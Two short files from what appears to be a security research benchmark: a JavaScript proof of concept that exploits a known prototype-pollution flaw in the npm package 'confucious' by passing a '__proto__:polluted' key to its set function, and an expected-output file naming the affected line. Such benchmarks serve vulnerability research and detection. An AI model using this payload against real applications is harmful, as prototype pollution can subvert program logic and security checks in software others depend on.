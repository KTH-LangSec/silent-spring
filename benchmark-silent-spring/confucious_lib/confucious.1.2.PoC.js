//https://snyk.io/vuln/SNYK-JS-CONFUCIOUS-598665
const confucious = require("confucious");
confucious.set("__proto__:polluted", { toString: function() { return "yes" }});
