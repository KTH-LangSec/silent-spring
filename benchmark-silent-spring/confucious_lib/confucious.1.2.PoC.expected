node_modules/confucious/confucious.js:45:21